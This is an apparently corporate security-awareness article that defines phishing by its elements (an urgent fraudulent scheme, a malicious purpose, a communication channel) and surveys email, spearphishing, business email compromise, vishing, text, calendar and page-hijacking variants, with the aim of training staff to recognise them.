What is Phishing?
What is Phishing?
Phishing is a fraudulent scheme to misappropriate information or assets. This article will break down the critical elements of a phishing attack and then identify different phishing modalities. Ultimately, the best phishing defense is knowledge and awareness.
There are three critical elements to a phishing attack. Each of those elements has different manifestations which impact the overall look, feel, and type of phishing attack.
Phishing requires some sort of active fraudulent scheme. That scheme poses some situations to drive urgency for communication. It can manifest in a few different ways, like:
An imminently due or overdue bill or invoice
The threat of law enforcement action
Threat to professional licensure
Assistance for an executive
That urgency is necessary to prey on humans’ innate fight-or-flight response. When faced with stress, people will either question the phishing attempt (fight) or accede to the lure. In the corporate environment, the workforce is typically helpful and accommodating toward clients, customers, and users. Phishers rely on that training to promote flight overfight responses. Since phishing is the most prevalent malicious entree in the corporate environment, that’s been a successful model.
Without that fraudulent scheme, a threat actor is outright asking for information they shouldn’t have and obtaining that information. That may occur through happenstance (someone asks for information and is mistakenly given that information) or through force (e.g., blackmail). Security Awareness Training should address both, but they’re not traditionally considered to be phishing.
Misappropriation or Malware Delivery
Phishing has a purpose. Otherwise, it’s just spam. That purpose is always malicious and comes in a couple of flavors.
One purpose is to misappropriate information or assets. These are communications that directly attempt to obtain sensitive information, account credentials, or money directly. Those can look like this:
An “executive” texts a company’s workforce member to buy hundreds of dollars of gift cards and sends them the codes
An “employee” who needs immediate help resetting their password with consequences if they’re not helped
A “patient” who needs access to their medical record
Another purpose is to deliver malware. Typically, this is done through macros or executables contained in attachments or embedded links. When opened, malicious code is downloaded onto the opener’s computer. That malicious code can impact the computer directly or create a point to generate persistence: semi-permanent access for a threat actor into a network. That persistence allows a threat actor to access resources on the network, exfiltrate them, and then deploy ransomware or otherwise cause harm to the environment.
Phishing requires communication. Most people, when they hear phishing, will think of email communications. While that’s an incredibly effective communication modality, it’s not the only one. Phishing can happen by text, phone, and even physical mail.
Some definitions of phishing will artificially limit phishing communication modalities to email. Those definitions seek to do so because they want to distinguish between more “traditional” phishing and social engineering. This article covers other communication modalities as phishing. There’s no wrong approach to defining these attacks. Frankly, your security awareness training needs to cover all those forms of attack in some way or another to safeguard your organization appropriately. How it covers it doesn’t really matter.
A fraudulent scheme to defraud by stealing information and money or deploying malware without communication would be what’s more traditionally thought of as a hack or insider threat, depending on the source. If the source is outside the organization, that’s a hack. If it comes from inside the organization, then that’s an insider threat. Both are critical to safeguarding with both infrastructure and security awareness training.
Types of Phishing
There are many different phishing attack manifestations. Individuals and groups running phishing attacks are very sophisticated and constantly coming up with new attack modalities to stay ahead of security awareness training and more effectively prey on individuals. Here are some of the overarching types.
This is arguably the most common phishing modality. Threat actors send emails, typically but not necessarily, in bulk to unsuspecting victims. Bulk mailing is preferred here because phishing is a threat that benefits from volume. If, for the sake of argument, only 5% of people succumb to phishing attacks, then 5% of 500,000 is significantly larger than 5% of 5,000.
As highlighted under Phishing Elements, email phishing is an email that encourages urgency to open an attachment, click a link, or provide information. These emails can be independently created, or they can spoof the look and feel of otherwise legitimate emails.
Email phishing is sometimes designed to target an organization's specific individual. This kind of phishing is called Spearphishing. Typically, spearphishing targets prominent individuals in an organization who control assets (financial or intellectual) and/or organizational leadership. Those emails leverage the individual’s position to exfiltrate important information, steal large sums of money, or gain sensitive information about those individuals.
Another form of email phishing that has risen in popularity over the past couple of years is Business Email Compromise or BEC. BEC is a practice whereby a threat actor gains access to the email systems of a company’s downstream vendor and then masquerades as the vendor to defraud the company of information or money. BEC is incredibly effective due to the apparent legitimacy of the attack and the ability to circumvent secure email gateways. However, it is a potentially difficult attack to implement because of the necessity of actual compromise of that downstream vendor.
Voice phishing, or vishing, is the practice of using a lure to draw someone to a phone call. Typically, this is done with an automated phone call. That automated phone call threatens some sort of disaster or negative consequences for failing to call.
Some forms of vishing may have non-phone lures. For example, if you visited a malicious website that displayed a popup informing you that your computer was infected with a virus and to call a number.
In any event, by calling that number, you’re directed to a call center. That call center will make various claims, typically with the ultimate goal of fraudulently obtaining money, either in the form of cryptocurrency or gift cards.
Vishing shares many characteristics of more traditional social engineering. In those social engineering cases, someone may call a company to attempt to reset a password without providing the necessary information typically needed to do so. Sometimes, this kind of attack is effective in providing access to threat actors to a company’s infrastructure.
Due to those similarities, some security awareness training programs may consider vishing to be generic social engineering and not phishing. As identified above, how vishing is characterized isn’t nearly as important as how to address and avoid vishing threats.
Text phishing, which is a generic term for SMS or MMS phishing, is a type of phishing done via SMS or MMS text messaging. The threat actor will request gift cards, ask the recipient to click a link or direct the recipient to call a number. This form of phishing has effectively the same effect as vishing or email phishing, with a different delivery modality.
That delivery modality drives effectiveness: texting is a more informal and personal form of communication. The attack is made more plausible because “hey, I got your number from [insert mutual acquaintance here], can you do me a favor…” is a totally foreseeable situation.
Calendar phishing occurs when someone sends a calendar invite to a recipient. Depending on the recipient’s calendar settings or active management of their own calendar, they may go into a meeting designed to defraud them of information, money, or other assets.
Calendar phishing is similar to vishing with a different lure. The success of calendar phishing depends on the recipient’s attentiveness to and management of their calendar. Someone who isn’t as attentive as they should be, has the potential to wander into a tricky situation. Since we collectively trust that meeting invites on our calendar should be on our calendar, this attack modality can be moderately successful.
This is one of the more controversial forms of phishing in that it only very technically meets the definition posed above; many definitions exclude it. Page hijacking is typically excluded because of its modality of communication. Instead of active outreach, which is typical for other forms of phishing outlined here, page hijacking relies on passive outreach via compromising an otherwise legitimate website.
While the modality of communication is different, the end result is the same: the compromise sends the browsing individual to a different website requesting money or information or deploys malicious content on the user’s computer.
Page hijacking is also used to conduct man-in-the-middle attacks. Instead of relying on an active phishing lure, those kinds of attacks allow the user to appropriately pass credentials and information on the site but also obtain those credentials for later use.
That example highlights why page hijacking is so controversially considered phishing: it includes activities that are traditionally defined as a different attack modality. It also highlights why classification isn’t as important as training. Whether page hijacking is identified as phishing or not, the threat is very real and potentially damaging to an organization.
There are many different kinds of phishing, all of which have a different look and feel but share a common goal: to steal information and money and/or compromise an organization’s network assets. This is also a quickly developing space. It has to be for threat actors to stay ahead of administrative and technical safeguards designed to thwart phishing attacks. Consequently, what’s critical is preventing attacks by training on how attacks manifest and how to avert them.